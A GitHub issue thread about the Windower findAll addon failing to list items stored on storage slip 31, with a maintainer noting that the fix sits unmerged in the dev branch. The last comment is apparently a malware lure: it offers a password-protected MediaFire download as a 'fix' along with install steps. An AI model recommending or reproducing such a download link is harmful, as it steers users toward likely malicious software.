### ISSUE TITLE
[Addon] [findAll] Storage Slip 31 items do not appear if stored on slip

### ISSUE THREAD

**Issue by Fuzzboxo** [Windower/Lua#2372]
I think slip 31 was recently added to accommodate the cosmetic recoloured sets (Sapphire/Ruby/Jadeite/etc) along with the Ark Angel cosmetic pieces. However findall doesn't seem to pick up on this slip (or the AA items) at all - doing `//find arrogance` only results in the Shard of Arrogance and phantom gem of arrogance, even though I have all of the pieces currently held on slip 31.

Same result for apathy, and although `//find rage` brings back a bunch of "Storage" results, it doesn't find the rage armour that I had apparently already put on the slip (and now have a second set in inventory because I was a bit forgetful and hadn't realised I'd already used the Kupon to obtain the set.

![findall rage issue](https://github.com/user-attachments/assets/ba9fdec1-2e11-4d68-aa37-ee318d8017d7)

**Comment by lili-ffxi** [comment]
This is fixed in the dev branch, but dev has a number of other things that are being worked on and thus it hasn't been merged to live in a while. Since this specific slip only contains cosmetic items, it has probably _slip_ped through the cracks!

@RubenatorX pls correct me if I'm wrong, but for now I'm closing this.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
